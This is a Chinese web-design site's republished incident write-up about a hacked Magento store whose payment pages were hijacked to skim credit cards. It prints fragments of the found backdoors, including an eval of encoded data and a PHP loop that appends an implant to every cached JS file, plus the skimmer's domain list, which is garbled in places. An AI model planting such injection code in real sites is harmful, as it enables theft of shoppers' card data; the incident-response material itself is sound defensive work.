商丘做網站,商丘網站優化,商丘網絡推廣,商丘網絡公司
當前位置:

Magento外貿網站被入侵支付被劫持跳轉怎么處理

發表日期:2023-05-11 11:36聚圣源瀏覽次數: 本文關鍵詞:代碼,版本,漏洞,都是,后門,分析,客戶,發現

Magento是最受歡迎的外貿電商框架之一,很多企業已經在其基礎上進行了二次開發。然而,對于使用2.x版本的老系統來說,安全問題也成為了一大難題。有些客戶在找我們SINESAFE做網站安全服務之前,客戶也找過建站的公司去清除后門,建站公司也將系統遷移升級到了最新的2.4.4版本,但后來發現問題并沒有完全的解決,還是會反復的被篡改代碼和用戶的支付頁面被劫持跳轉,問題的根源是代碼里已經被黑客植入后門了,數據庫也被留了木馬病毒,這個時候不光是要升級magento到最新版本,還得要把木馬后門給徹底的清理掉,做好安全加固和防護,才能徹底的解決這個問題。

因為2022年以前的Maganto 2.x版本存在很多漏洞,像遠程代碼執行漏洞、SQL注入漏洞都是比較高危的,如果不及時升級到2.x版本就很容易被黑客攻擊。但是,即使升級到2.x版本,也不代表完全解決了安全問題。因此,針對這種情況,企業需要認真評估自身的安全風險,并采取措施進行安全加固。具體來說,可以通過加強訪問控制、強化數據保護等方式來提高系統安全性。同時,定期對系統進行漏洞掃描和代碼安全審計,及時修補代碼漏洞和加強網站的安全防護,也是減輕安全風險的有效措施。

我們SINE安全處理了很多外貿客戶使用magento被黑客入侵的安全問題,雖然在國內Magento并不被廣泛使用,但它在國外卻十分流行。然而,一些老版本的Magento很容易被攻擊者通過框架拿shell等方式入侵。以下就是我們SINE安全處理客戶的magento被黑客攻擊的過程記錄:

排查黑客攻擊的問題時,很容易陷入只分析日志等細節的誤區。其實,在進行任何分析之前,我們都需要先做以下幾件事情:

第一,核實信息。這就像是我們在找錯問題之前,需要先了解出現問題的具體細節和當前服務器的環境情況。

第二,斷開服務器的外網鏈接,保障安全。這就像是把自家的大門關上,不讓壞人輕松進入。

第三,保存服務器的環境,以及現場的各種信息,如端口網絡、應用程序、日志文件等。這樣,就像是在證據鏈中留下關鍵的線索,更有利于我們查找和分析問題,而且要注意不要有寫操作哦!

在現場環境中,雖然我們可能無法找到確切的問題所在,但是可以通過查看歷史日志,來檢查是否存在服務器linux系統被提權等可疑行為。如果使用了chkrootkit、rkthunter和lynis等安全掃描工具,也未發現任何問題,那還是建議客戶考慮更換服務器,以避免潛在的安全風險。

我們SINE安全首先從web層面去看,分析了網站訪問日志,nginx日志,數據庫日志發現有許多黑客攻擊的痕跡,利用的都是Magento的一些高危漏洞進行的,也可以說明網站被入侵是由于magento低版本存在漏洞導致,我們立即展開對系統以及源代碼的安全審計,人工去分析每一行代碼,通過我們的檢測,發現4個木馬后門,如下:

 

bmMoJ2FjdGlvbicgLiAkX1BPU1RbJ2EnXSk7CmV4aXQ7Cg=="; eval(_decode($VKGPOZ)); ?>

 

foreach (glob("/www/wwwroot/dev.******.com/pub/static/_cache/merged/*.js") as $filename) {

if (!preg_match("/lG68xv3NXN/", file_get_contents($filename))) {

file_put_contents($filename, _decode($implant), FILE_APPEND);

echo "updated: {$filename} ";

} else {

echo "ok: {$filename} ";

}

}

通過上面的代碼我們可以發現都是一些webshell木馬后門,像filemanPHP大馬,一句話木馬,以及定時篡改網站全部JS功能的代碼,通過分析,我們SINE安全發現黑客入侵的目的不是為了掛馬和掛黑鏈,而是為了盜取用戶的信用卡信息,用于盜刷。我們對黑客植入到JS的代碼進行了分析與解密,發現該JS代碼是用來記錄用戶的信用卡信息,針對Magento支付相關頁面(onepage|checkout|onestep|payment|transaction)中所有的表單信息,也會判斷來路是從

const domains =["securecode.com","psncdn.com","googleadservices.com","googletagmanager.com","google.com"];"apprater.net","shopperapproved.com","chromecast-setup.com","ssl-images-amazon.com","google.com"];的用戶,會將信用卡的信息POST發送到黑客的指定網站上。

看來黑客的目的就是為了要盜取用戶的信用卡信息,用于盜刷來獲取巨大的利益。道高一尺魔高一丈,我們SINE安全十多年來一直與黑灰產進行對抗,通過此次幫客戶處理的magento的安全問題,我們又總結了新的經驗,也希望分享這個處理過程讓大家有所收獲。

如沒特殊注明,文章均來自網絡! 轉載請注明來自:http://www.legea.net/news/jzjy/57.html

網站設計案例推薦

熱門文章

企業網站備案需要什么材料?需...

網站備案就像身份證一樣,當企業進行網站改版或者次做網站需要進行域名備案工作,工作由當地的工信部門管理需要準備那些材料那?一起來看一下吧! 企業網站備 1、辦單位有效證件掃描件上...

日期:2021-03-04 瀏覽次數:8000

手機建站教程:手機網站建設的...

手機網站建設的定義 在中國,有4億網民正在使用手機瀏覽產品和服務信息,可以讓您隨時隨地處理客戶咨詢、客戶預約、企業管理,賦予您一個8小時之外的移動秘書。我們對每一個手機網站都會...

日期:2019-11-04 瀏覽次數:8000

網站超鏈接怎么做 其實很簡單...

如何創建站點超鏈接?SiteTime是一個站點中很常見的元素類型,在 HTML入門教程中,也會解釋什么是 a標簽, A標簽就是做站點 Time的標簽。 站點超鏈接生成方式 修改后綴為 html的新 txt文件 打開記事...

日期:2021-06-02 瀏覽次數:7999

挑選適合自己的網站建站程序技...

在互聯網發展突飛猛進的今天,網站建站已不是什么稀奇事兒,也沒有大家想的那么復雜,但要做好就有點難了。經常建站的人都知道,想建好一個網站,選擇一款適合自己的建站程序很重要,目...

日期:2019-12-16 瀏覽次數:7998

都說自助建站更便宜 和手工建站...

費用對比 1、經濟、標準型企業網站費用比較 網站建設費用:總費用1800元至3600元,含域名、100M-200M的優質空間(可自由增加)、110M企業郵局(即你的域名后綴郵箱帳號)、網站制作設計、有后臺...

日期:2019-11-08 瀏覽次數:7998

相關文章

網站被攻擊 該怎樣查找漏洞并進...

很多公司的網站被攻擊,導致網站打開跳轉到別的網站上去,網站快照也被篡改,收錄一些非法的內容快照,有些網站數據庫都被篡改,修改了會員資料,數據庫被刪除,等等攻擊癥狀,我們SIN...

日期:2019-07-29 瀏覽次數:6119

網站安全滲透 對OA系統越權漏洞...

滲透測試服務,是甲方授權乙方安全公司對自身的網站,以及APP,辦公系統進行的全面人工安全滲透,對漏洞的檢測與測試,包括SQL注入漏洞,XSS存儲漏洞,反射漏洞,邏輯漏洞,越權漏洞,我們S...

日期:2019-07-26 瀏覽次數:5860

網站存在xss跨站漏洞的解決辦法...

很多公司的網站維護者都會問,到底什么XSS跨站漏洞?簡單來說XSS,也叫跨站漏洞,攻擊者對網站代碼進行攻擊檢測,對前端輸入的地方注入了XSS攻擊代碼,并寫入到網站中,使用戶訪問該網站的...

日期:2019-08-03 瀏覽次數:7133

CVE-2019-0193 apache 漏洞利用與安全...

apache最近爆出的漏洞越來越多,旗下的solr產品存在遠程服務器執行惡意代碼漏洞,該漏洞產生的主要原因是因為apache dataimporthandler數據外部收集的一個端口模塊,該模塊支持從遠程的地址進行通信...

日期:2019-08-12 瀏覽次數:6246

CVE-2019-1181 RDP協議漏洞導致執行...

2019年8月14日,微軟發布更新了windows的系統補丁,代號:CVE-2019-1181,CVE-2019-1182補丁針對與windows遠程桌面遠程代碼執行漏洞進行了全面的修復,根據SINE安全技術對補丁的分析發現修復的這兩個漏洞...

日期:2019-08-15 瀏覽次數:5137

隨機推薦

為網站申請和配置StartSSL的SSL證...

淺談網站服務器的負載能力問題...

網站建設選自助建站,還是定制...

模板建站的缺點 你了解多少?...

外貿建站程序用什么比較好?該...

推廣域名在微信中被攔截、封殺...

97超频国产在线公开免费视频_99国产超薄丝袜足j在线观看_中文字幕av一区二区三区_一区二区中文字幕